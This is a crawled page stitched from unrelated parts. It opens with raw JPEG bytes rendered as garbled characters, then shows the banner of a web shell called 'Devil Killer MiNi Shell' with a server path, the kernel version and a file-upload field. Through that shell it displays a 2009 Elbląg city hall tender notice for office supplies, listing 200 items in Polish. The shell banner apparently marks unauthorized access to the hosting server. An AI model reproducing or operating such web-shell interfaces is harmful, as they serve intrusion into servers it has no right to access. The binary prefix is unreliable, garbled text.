JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090304/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090304/48682-N-2009.html

<p class="kh_header"><b>Elbląg: Dostawa materiałów biurowych</b><br>
<b>Numer ogłoszenia: 48682 - 2009; data zamieszczenia: 04.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd  Miejski , ul. Łączności 1, 82-300 Elbląg, woj. warmińsko-mazurskie, tel. 055 2353536, 2393125, faks 055 2353555, 2393334.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umelblag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest:

Dostawa materiałów biurowych

Przedmiot główny:
Nazewnictwo wg CPV:	Różny sprzęt i materiały biurowe

Przedmioty dodatkowe:
Nazewnictwo wg CPV:	Części i akcesoria do maszyn biurowych
Nazewnictwo wg CPV:	Skoroszyty
Nazewnictwo wg CPV:	Skoroszyty i podobne wyroby
Nazewnictwo wg CPV:	  Rejestry, księgi rachunkowe, skoroszyty, formularze i inne wyroby piśmiennicze     
                                       z papieru lub tektury
Nazewnictwo wg CPV:	Noże i nożyczki
     Nazewnictwo wg CPV:	Niszczarki


Przedmiot zamówienia obejmuje dostawę niżej wymienionych materiałów biurowych:

1)	BLOK  TECHNICZNY A4 biały 20 kartek				
2)	BLOK z makulatury o formacie A4 - 50 kart.			
3)	BLOK z makulatury o formacie A5 - 50 kart.					
4)	CIENKOPIS do pisania na płytach CD-R oraz na foliach czarny S=0,4mm - szybkoschnący	
5)	CIENKOPIS kulkowy PILOT HI-TECPOINT V5- GRIP niebieski gr. linii pisania 0,3mm, dł. linii pisania 2500m skuwka z metalowym klipem, okienko pozwalające na kontrolę zużycia tuszu, dozownik wpływu atramentu- ATT system					
6)	CIENKOPIS  STABILO Point 88 - CZARNY, gr. linii 0,4mm, końcówka oprawiona w metal, wentylowana skuwka, bardzo ekonomiczny w użyciu , odporny na wysychanie tusz, obudowa sześciokątna	
7)	CIENKOPIS  STABILO Point 88 - CZERWONY, gr. linii 0,4mm, końcówka oprawiona w metal, wentylowana skuwka, bardzo ekonomiczny w użyciu , odporny na wysychanie tusz, obudowa sześciokątna						
8)	CIENKOPIS  STABILO Point 88 - NIEBIESKI, gr. linii 0,4mm, końcówka oprawiona w metal, wentylowana skuwka, bardzo ekonomiczny w użyciu , odporny na wysychanie tusz, obudowa sześciokątna					
9)	CIENKOPIS  STABILO Point 88 - ZIELONY, gr. linii 0,4mm, końcówka oprawiona w metal, wentylowana skuwka, bardzo ekonomiczny w użyciu , odporny na wysychanie tusz, obudowa sześciokątna	
10)	CLIPBOARD podkład z klipsem zamykany  format A4					
11)	DŁUGOPIS  PENTEL BK77 czarny, PROSTA PRZEZROCZYSTA OBUDOWA, NA WKŁADY WYMIENNE BKL7, dł. linii pisania:1700m						
12)	Długopis TITANUM AA 998 - wkład czarny					
13)	Długopis TITANUM AA 998 - wkład niebieski						
14)	DŁUGOPIS  ZENITH - 10 - automatyczny z wkładem wielkopojemnym Zenith w obudowie metalowej 
15)	DŁUGOPIS na sprężynce  DOX - Z WYMIENNYM WKŁADEM, PODSTAWKA PRZYKLEJANA DO PODŁOŻA, PRZEZROCZYSTA OBUDOWA UMOŻLIWIA KONTROLĘ ZUŻYCIA, ISTNIEJE MOŻLIWOŚĆ REGULACJI NACHYLENIA UMIESZCZANIA DŁUGOPISU, DŁUGOŚĆ SPRĘŻYKI PO ROZCIĄGNIĘCIU 150 CM.		
16)	DZIURKACZ  REXEL P265 -do jednorazowego dziurkowania 65 kartek, wykonany z metalu, z wydłużoną dźwignią						
17)	DZIURKACZ EAGLE P6108B, metalowy, wykończony tworzywem sztucznym, wyposażony we wskaźnik środka strony oraz listwę formatową, rozstaw dziurek 80mm, średnica otworu 5,5mm, do jednoraz. dziurkowania 25 kartek		
18)	EKIERKA RÓŻNORAMIENNA 20 CM				
19)	ETYKIETY do drukarek laserowych samoprzylepne 8 szt. na arkuszu formatu A4 -                                                          szt. arkuszy A4		
20)	ETYKIETA samoprzylepna na segregator - w szt.						
21)	FOLIA do laminowania A4 2x100mic.w opakowaniach po 100szt.				
22)	FOLIA do laminowania A5 2x100mic.w opakowaniach po 100 szt.			
23)	FOLIA do plotera  HP DJ 800 MATOWA 75MY. 0.914X20MT.				
24)	GABLOTA WEWNĘTRZNA typu Nobo Pacific o rozmiarze 8 xA4 - magnetyczna suchościeralna , o zaokrąglonych kształtach, rama wykonana z aksydowanego aluminium, ochronna szyba o gr.4mm, zamykana na klucz (w komplecie dwa klucze),zaokrąglone narożniki, blokada drzwiczek zapobiegająca porysowaniu ściany przy otwieraniu, duża głębokość gabloty umożliwiająca stosowanie nawet największych magnesów .  W komplecie  wszystkie części niezbędne do montażu.		
25)	GAZETOWNIK TEKTUROWY A4, szer. grzbietu 7cm /JEDNEGO KOLORU/		
26)	GAZETOWNIK plastikowy A4, szer. grzbietu 7cm					
27)	Gilotyna do przycinania zdjęć z możliwością ustawienia formatu				
28)	GRAFITY do ołówków PENTEL 0,5B- małe opakowania				
29)	GRAFITY do ołówków PENTEL  0,5 2B - małe opakowania
30)	GRAFITY do ołówków PENTEL  0,5 HB - małe opakowania
31)	GRZBIETY DO BINDOWANIA 14 MM - NIEBIESKIE W SZT.    
32)	GRZBIETY DO BINDOWANIA 19 MM - ZIELONE W SZT.
33)	GRZBIETY DO BINDOWANIA 50 MM - CZARNE W SZT.
34)	GUMKA POLYMEROWA  MINI ZEH O3  PENTEL - wycierająca ołówek nie naruszając struktury papieru, o wym.3,5x1,6x1,2 cm.
35)	IDENTYFIKATORY  ze smyczą i klipsem do przypinania w dwóch położeniach, wykonane ze sztywnego przezroczystego tworzywa- w szt. o wym.7,5 x 11, 4 cm. Dla celów bezpieczeństwa smycz posiada specjalny plastikowy zamek otwierający się w razie silnego pociągnięcia.
36)	KASETKI METALOWE zamykane na klucz do przechowywania pieczątek o wym.77x207x157mm
37)	KALKULATOR CITIZEN SDC-888T - podwójna pamięć, zaokrąglanie wyników, obliczanie marży, klawisz podwójnego zera, plastikowe klawisze, gwarancja 24 miesiące
38)	KLEJ SZTYFT  BANTEX -22 g do klejenia papieru, zdjęć, tektury, tkaniny i innych materiałów
39)	KLEJ W PŁYNIE  PRITT Pen 40 ml
40)	KOPERTA C4 biała samoprzylepna (229x324mm) - w szt.
41)	KOPERTA B5 biała samoprzylepna (176x250mm) - w szt.
42)	KOPERTA DL biała, samoprzylepna, bez okienka (110x220mm) - w szt.
43)	KOPERTA DL biała, samoprzylepna, okienko z prawej strony (110x220mm) - w szt.
44)	KOPERTA C6 biała, samoprzylepna (114x162mm) - w szt.
45)	KOPERTA C6 biała, samoprzylepna (114x162mm) Z NADRUKIEM I  ZWROTKĄ -POTWIERDZENIE ODBIORU- w szt.
46)	KOPERTA z zabezpieczeniem powietrznym AIR POC o wym. 180x225 - w szt.
47)	Koperta z poszerzonymi bokami o wym.255x390x40 w szt.
48)	KOREKTOR W PIÓRZE BIAŁY  PENTEL - 7ML, szybkoschnący, z metalową końcówką
49)	KOREKTOR W PŁYNIE  PRITT 20ml, biały, szybkoschnący  
50)	KOREKTOR W TAŚMIE typu MYSZKA -biały
51)	KOSZULKA  A4  Esselte z folii o gr. 50 mikronów, krystaliczna, w opak. 100 szt.
52)	KOSZULKA A5 Z FOLII O GR.50 MIKRONÓW, KRYSTALICZNA w szt.
53)	KOSZULKI NA KATALOGI A4 Z KLAPKĄ -GRUBOŚĆ FOLII 170 MIC.
54)	KREDKI ołówkowe (12 kolorowe)
55)	LINIJKA 20 cm plastikowa przezroczysta
56)	LINIJKA 30 cm plastikowa przezroczysta
57)	LISTWA do bindowania  A4- cienka 6 mm
58)	LISTWA do bindowania  A4-gruba 12 mm
59)	MAGNESY DO TABLICY MAGNETYCZNEJ suchościeralnej - śred.2 cm
60)	MARKER Lumokolor STAEDTLER permanentny, wodoodporny, atrament DRY SAFE, dzięki któremu może on pozostawać bez skuwki do 14 dni i nie wyschnie; gr. linii 2mm, okrągła końcówka, CZARNY
61)	MARKER  Lumokolor STAEDTLER permanentny, wodoodporny, atrament DRY SAFE, dzięki któremu może on pozostawać bez skuwki do 14 dni i nie wyschnie; gr. linii 2mm, okrągła końcówka,  CZERWONY
62)	MARKER Lumokolor STAEDTLER permanentny, wodoodporny, atrament DRY SAFE, dzięki któremu może on pozostawać bez skuwki do 14 dni i nie wyschnie; gr. linii 2mm, okrągła końcówka,  NIEBIESKI
63)	MARKER Lumokolor STAEDTLER permanentny, wodoodporny, atrament DRY SAFE, dzięki któremu może on pozostawać bez skuwki do 14 dni i nie wyschnie; gr. linii 2mm, okrągła końcówka,  ZIELONY
64)	MARKER olejowy  PILOT  - biały   szybkoschnący, gr. linii  pisania 1mm, pisze po każdej powierzchni, odporny na ścieranie, działanie wody i światła
65)	MARKER olejowy  PILOT  - czarny,   szybkoschnący, gr. linii  pisania 1mm, pisze po każdej powierzchni, odporny na ścieranie, działanie wody i światła
66)	Markery do tablic suchościeralnych - w kompletach po 4 szt./4 kolory/
67)	MAZAKI - flamastry 12 kolorów w kpl.
68)	MAZAKI - flamastry 4 kolory w kpl.
69)	NABOJE do pióra PARKER  CZARNE DŁUGIE W SZT.
70)	NABOJE do pióra   CZARNE KRÓTKIE W SZT.
71)	NOTES KOSTKA do przyborników BIAŁA    7,5 cm x 9 cm
72)	NOTES samoprzylepny MEMO - STICK o wym. 5 cm x 4 cm
73)	NOTES samoprzylepny MEMO-STICK o wym. 7,5 cm x 7,5 cm
74)	NOTES ze skorowidzem na telefony - wym.12cm x 21cm
75)	NOZYCZKI klasyczne całe ze stali nierdzewnej  - 20 cm
76)	NOŻYK BIUROWY  z wymiennym ostrzem / w opak. 3 ostrza zapasowe 9 mm/
77)	OFERTÓWKA A4 przezroczysta, wykonana z folii PCV o gr. 150 mikr. w szt.
78)	OKŁADKA  do listew zaciskowych A4 - szt
79)	OKŁADKI NIEBIESKIE I ZIELONE do bindowania A4 CHROMOLUX  W OPAK. PO 100SZT.
80)	OKŁADKA PRZEZROCZYSTA  bezbarwna do bindowania 0,20 mm  A4W OPAK. PO 100 SZT.
81)	OŁÓWEK AUTOMATYCZNY STAEDTLER 774- gr. linii 0,5 mm ; z metalową końcówką, z metalowym zasobnikiem zabezpieczającym na grafity. Nowy mechanizm ołówka gwarantujący zużycie grafitu aż w 95%  posiada długą, regulowaną gumkę najwyższej jakości, którą można wymieniać. Ołówek posiada praktyczny klips.
82)	OŁÓWEK o twardości HB z gumką
83)	PAPIER DO PLOTERA  HP  DJ 800 50/90G/M2 0,914X45 M  w rolkach
84)	PAPIER samoprzylepny A4 - w szt. ŻÓŁTY
85)	PAPIER samoprzylepny A4 - w szt. ZIELONY
86)	PAPIER samoprzylepny A4 - w szt. POMARAŃCZ.
87)	PAPIER samoprzylepny A4 - w szt. BIAŁY
88)	PAPIER SZARY do pakowania w kg
89)	PAPIER CZERPANY A4 BEŻOWY- FAKTURA PŁÓTNA  z czteroma naturalnie uformowanymi krawędziami, w szt.
90)	PAPIER WIZYTÓWKOWY BIAŁY A4 - 4 rodzaje faktury papieru gr. 230g/m2  w szt.
91)	PAPIER WIZYTÓWKOWY A4 ZIELONY MARMUREK -  gr. 170g/m2  w szt.
92)	PAPIER WIZYTÓWKOWY A4 BEŻOWY MARMUREK -  gr. 170g/m2  w szt.
93)	PAPIER XERO  kolorowy COLORIT o formacie A4 -POMARAŃCZOWY- w ryzie 500 ark.
94)	PAPIER XERO kolorowy COLORIT o formacie A4 - ZIELONY/jasny/ - w ryzie 500 ark.
95)	PAPIER XERO kolorowy COLORIT o formacie A4 - ŻÓŁTY- w ryzie 500 ark.
96)	PAPIER XERO  POLLUX A3, gramatura 80 g/m2, o białości nie mniejszej niż CIE 161- ryzy po 500 ark.
97)	PAPIER XERO  POLLUX  A4, gramatura 80 g/m2, o białości nie mniejszej niż CIE 161 - ryzy po 500 ark.
98)	PINEZKI zwykłe  -  małe pudełka po 100 szt.
99)	PINEZKI kołeczki - w opak. 200 szt.
100)	PIÓRO kulkowe PARKER VECTOR - czarne
101)	PIÓRO ŻELOWE UNI BALL SIGNO UNI UM-100 - Z WYMIENNYM WKŁADEM, TUSZ WODOODPORNY I NIE BLAKNĄCY W ŚWIETLE SŁONECZNYM, PISZE CIENKO I BEZ PRZERYWANIA, KULKA Z WĘGLIKA WOLFRAMU GŁADKO PRZESUWA SIĘ PO KARTCE, NAWET PRZY MAŁYM NACISKU, WYPOSAŻONE W BEZPIECZNĄ SKUWKĘ, SPECJALNY OTWÓR UMOŻLIWIA ODDYCHANIE W PRZPADKU POŁKNIĘCIA, GRUB. LINII PISANIA OK.0,3 MM  /czarne - 200 szt. i niebieskie - 275 szt./
102)	PODKŁADY NA BIURKO przezroczyste o wym. 50cmx65cm
103)	PODUSZKI do pieczątek - CZERWONE o wym.11cmx7cm
104)	PODUSZKI do pieczątek - CZARNE O WYM. 11CMX 7 CM
105)	PODUSZKI do pieczątek - CZERWONE o wym.20cmx12cm
106)	PODUSZKI do pieczątek metalowych / okrągłych/
107)	POJEMNIK na CD NA 100 szt.
108)	POJEMNIK na dyskietki  50 szt.
109)	POJEMNIK NA DŁUGOPISY NIMBUS-REXEL - wykonany z trwałego, przezroczystego akrylu, wysoka jakość wykonania
110)	PRZEKŁADKI PLASTIKOWE do segregatora A4 - w 1 kpl. 10 kolorowych przekładek
111)	PRZYBORNIK BIUROWY z akrylu - o wym. 20cmx14cm
112)	PRZYBORNIK BIUROWY  wykonany z wysokiej jakości tworzywa sztucznego przezroczystego - o wym.: średnica 115 x wysokość 115 mm
113)	PUDEŁKO MAGNETYCZNE do spinaczy
114)	ROLKA KASOWA TERMICZNA  szer.57 mm dł. 30 mb.
115)	ROLKA TERMICZNA do kasy fiskalnej 28mmx30m
116)	ROZSZYWACZ do zszywek
117)	SEGREGATOR A5  BANTEX szerokość grzbietu 7 cm, oklejony na zewnątrz i wewnątrz folią PCV, wzmocnione krawędzie dolne
118)	SEGREGATOR Handy A4 szerokość grzbietu 3,5 cm, oklejony na zewnątrz i wewnątrz folią PP, mechanizm 2-ringowy
119)	SEGREGATOR A4 BANTEX szerokość grzbietu 5 cm, oklejony na zewnątrz folią PP, wewnątrz biała nabłyszczana wyklejka papierowa, dolne krawędzie wzmocnione metalową szyną
120)	SEGREGATOR A4 BANTEX szerokość grzbietu 7,5 cm, oklejony na zewnątrz folią PP, wewnątrz wyklejka papierowa, dolne krawędzie wzmocnione metalową szyną
121)	SEGREGATOR A4 archiwizacyjny, szer. grzbietu 8 cm, wykonany z tektury o gr.2mm, w kolorze naturalnego kartonu
122)	SKOROSZYT Z ZAWIESZKĄ  A 4 -połówka, wykonany z kartonu 280 g/m2 w kolorze białym, z metalowym wąsem umożliwiającym wpinanie akt
123)	SKOROSZYT plastikowy A4 - przednia okładka przezroczysta, tylna kolorowa z metalowym wąsem
124)	SKOROSZYT plastikowy A4 -oczko, z otworami pozwalającymi na wpięcie do segregatora, przednia okładka przezroczysta, tylna kolorowa z metalowym wąsem
125)	SKOROSZYT zwykły A4 z fałdą poprawiającą sztywność grzbietu, wykonany z kartonu 280 g/m2 w kolorze białym, z metalowym wąsem umożliwiającym wpinanie akt
126)	SKOROSZYT oczkowy A4 z otworami pozwalającymi na wpięcie do segregatora, wykonany z kartonu 280 g/m2 w kolorze białym, z metalowym wąsem umożliwiającym wpinanie akt
127)	SKOROSZYT zaczepowy A4- z zawieszką pozwalającą na wpięcie do segregatora, wykonany z kartonu 280 g/m2 w kolorze białym, z metalowym wąsem umożliwiającym wpinanie akt
128)	SKOROSZYT oczkowy A4-połówka,z otworami pozwalającymi na wpięcie do segregatora, wykonany z kartonu 280 g/m2 w kolorze białym, z metalowym wąsem umożliwiającym wpinanie akt
129)	SKOROWIDZ A4 alfabetyczny, 96 kartek w kratkę
130)	SKOROWIDZ A5 alfabetyczny, 96 kartek w kratkę
131)	SPINACZE BIUROWE 25 mm, trójkątne, srebrne w opakowaniach po 100 szt. spinaczy
132)	SPINACZE BIUROWE 50 mm, owalne, srebrne w opakowaniach po 100 szt. spinaczy
133)	SPINACZE KLIPSY  - 25 mm  w szt.
134)	SPINACZE KLIPSY  - 32 mm  w szt.
135)	STOJAK  OBROTOWY na pieczątki
136)	STOJAK  NA LISTY NIMBUS - REXEL - DWUPRZEGRODOWY STOJAK  na listy , wykonany z trwałego, przezroczystego akrylu , przeznaczony do przechowywania różnych wymiarów korespondencji lub wizytówek . Wysoka jakość wykończenia..
137)	SZNUREK jutowy do pakowania - w kłębkach 10 dkg.
138)	SKŁADANKA - papier komputerowy 210x12x2, 6 CALI , oryginał -kolor biały, kopia - różowa,  900 składek/karton
139)	SKŁADANKA - papier komputerowy 390x12x1,   900 składek/karton
140)	TABLICA KORKOWA o wym.80x120 cm Z RAMĄ DREWNIANĄ
141)	TABLICA KORKOWA O WYM. 30 X 45 CM Z RAMĄ DREWNIANĄ
142)	TABLICA KORKOWA O WYM. 90X60 Z RAMĄ DREWNIANĄ. Tablicę można zawiesić na ścianie w układzie pionowym lub poziomym.
143)	TACKI NA DOKUMENTY -plastikowe, przezroczyste o wymiarach 350x245x60mm
144)	TAŚMA KLEJACA 3/4 przezroczysta (szpula 18mm x 20 m)
145)	TAŚMA KLEJĄCA PAKOWA o szer.50mm dł. 66m
146)	TAŚMA dwustronnie klejąca szer. 38mm dł.10 m
147)	Teczka ofertowa A4 w twardej okładce - 40 mocnych, wytrzymałych koszulek, wewnętrzna kieszeń na płytę CD
148)	TECZKA DO PODPISU A4, z 12 przekładkami typu Bantex, wykonana z mocnego kartonu powlekanego kolorową folią polipropylenową, na frontowej okładce okienka do opisu, harmonijkowy grzbiet zapewniający dużą pojemność.
149)	TECZKA DO PODPISU A4, z 20 przekładkami typu Bantex, wykonana z mocnego kartonu powlekanego kolorową folią polipropylenową, na frontowej okładce okienka do opisu, harmonijkowy grzbiet zapewniający dużą pojemność.
150)	TECZKA PLASTIKOWA A4 wiązana -przednia okładka przezroczysta
151)	TECZKA WIĄZANA A4, wykonana z białego kartonu 280 g/m2, posiadająca trzy wewnętrzne klapy.
152)	TECZKA Z RĄCZKĄ  A4 - wykonana z grubego kartonu pokrytego kolorową folią polipropylenową, szer. grzbietu 40mm
153)	TECZKA kartonowa A4 z narożnymi gumkami, wykonana z białego kartonu 280 g/m2, z trzema wewnętrznymi klapami.
154)	TECZKA jednostronnie lakierowana KOLOROWA A4 z mocnego kartonu 280 g/m2 z gumkami narożnymi w kolorze teczki
155)	TECZKA z gumką 2 VauPE - DWUSTRONNIE BARWIONA, laminowana kolorową folią polipropylenową, tektura twarda 1 mm, grzbiet 10 mm
156)	TECZKA zamykana na rzep A4 - tektura twarda 2 mm kolorowa typu VauPE
157)	TEMPERÓWKA KUM w kształcie klina - metalowa , ze stalowym ostrzem mocowanym wkrętem, rowkowania  w korpusie ułatwiają trzymanie 
158)	TUSZ do pieczątek NORIS 25 ml czerwony
159)	TUSZ do pieczątek NORIS 25 ml czarny
160)	TUSZ do pieczątek NORIS 25 ml  NIEBIESKI
161)	TUSZ do stempli metalowych typu NORIS 25 ml czerw.
162)	WIZYTOWNIKI  A5 - OKŁADKI WYKONANE ZE SZTYWNEJ, MATOWEJ  FOLII PP O GRUB. 0,5 MM, RINGI VARIO ZIPP O WYSOKOŚCI 25 MM, 14 KRYSTALICZNYCH, GRUBYCH KOSZULEK NA 84 WIZYTÓWKI, BARDZO WYGODNE WSUWANIE WIZYTÓWEK OD GÓRY, DODATKOWA KIESZEŃ BEZ PERFORACJI NA NIEFORMATOWE WIZYTÓWKI, 9 PRZEKŁADEK Z GRUBEJ, MATOWEJ FOLII PP Z NADRUKOWANYMI INDEKSAMI, MOŻLIWOŚĆ ROZBUDOWANIA WIZYTOWNIKA.
163)	WKŁAD do długopisów żelowych HANDY GEL-NIEBIESKIE
164)	WKŁAD do długopisu PENTEL BK 77- NIEBIESKIE
165)	WKŁAD kulkowy 0,5 mm czarny do pióra PARKER VEKTOR
166)	WKŁAD kulkowy 0,5 mm niebieski do pióra PARKER
167)	WKŁAD żelowy do długopisu PARKER -  0,7 niebieski
168)	WKŁAD do długopisu ZENITH w obudowie metalowej - niebieski
169)	WKŁAD do długopisu ZENITH w obudowie metalowej - czarny
170)	WKŁAD UMR 5 do pióra żelowego UNI BALL UM100 - czarny
171)	WKŁAD UMR 5 do pióra żelowego UNI BALL UM100 - niebieski
172)	WKŁAD UMR 5 do pióra żelowego UNI BALL UM100 -czerwony
173)	WKŁAD do długopisu TITANUM AA 998- niebieski
174)	WKŁAD do długopisu TITANUM AA 998- czarny
175)	WORKI do niszczarki 160 l w szt.
176)	WYSOKOŚCIOMIERZ SUUNTO PM-5/1520- prosty wysokościomierz bez pryzmatu , dwie skale 15/30 i 20/40 .w komplecie tablica przeliczeniowa % na stopnie (0 do 45 stopni). Obudowa z anodowanego aluminium. Dokładność odczytu wynosi 0,25m.
177)	ZAKREŚLACZ fluorescencyjny STAEDTLER TOPSTAR  RÓŻOWY
178)	ZAKREŚLACZ fluorescencyjny STAEDTLER TOPSTAR ZIELONY
179)	ZAKREŚLACZ fluorescencyjny STAEDTLER TOPSTAR ŻÓŁTY
180)	ZAKREŚLACZ fluorescencyjny STAEDTLER TOPSTAR POMARAŃCZOWY
181)	ZESZYT A4 - 192 kartkowy w kratkę  (MONTANO)
182)	ZESZYT A4 - 96 kartkowy w kratkę, twarda okładka
183)	ZESZYT B5 -P 160 kartkowy w kratkę, twarda okładka  
184)	ZESZYT A5 - 32 kartkowy w kratkę
185)	ZESZYT A5 - 96 kartkowy w kratkę, twarda okładka
186)	ZSZYWACZ długoramienny EAGLE 950 L - długość 380 mm, z metalową podstawą wyposażony w mechanizm naciągu, zszywający do 15 kartek, na zszywki 24/6 i 26/6
187)	ZSZYWACZ metalowy EAGLE umożliwiający zszywanie 100 kartek, na zszywki 23/ 8-13
188)	ZSZYWACZ  EAGLE GALAXY S6083B , metalowy wyposażony w obrotowy mechanizm umożliwiający zaginanie zszywek do wewnątrz i na zewnątrz,  zszywa 25 kartek, na zszywki 24/6
189)	ZSZYWKI  24/6 -małe opakowania po 1000 szt. zszywek
190)	ZSZYWKI  HEAVY DUTY 23/10 - małe opakowania po 1000 szt. zszywek
191)	ZWILŻACZ wodny
192)	ZWILŻACZ glicerynowy
193)	WORKI SANITARNE MOCNE 120 l, o wym. 70x110cm, gr. folii 30 mikronów, w opakowaniach po 25 szt.
194)	RĘKAWICE foliowe jednorazowe, rozmiar średni, z folii HDPE, w opakowaniach po 100 szt.	
195)	Tablica korkowa 120x180 cm				- 1 szt.
196)	Flipchart						- 1 szt.
wymagania: blat suchościeralno-magnetyczny, 
sprężynujący zacisk bloku papieru, bolce do zawieszania 
bloku papieru o formacie 70x100, półka na markery, 
regulacja kąta pochylenia tablicy, dwa rozkładane ramiona 
do mocowania plansz, pięcioramienna podstawa jezdna 
wyposażona w kółka z hamulcami
197)	Pinezki beczułki kolorowe po 200 szt. 			- 1 op.
198)	Wycierak filcowy					- 2 szt.
199)	Płyn czyszczący do tablic suchościeralnych 500 ml	
z atomizerem						- 1 szt.
200)	Magnesy do tablicy magnetycznej suchościeralnej 30mm
po 10 szt.						- 2 op.
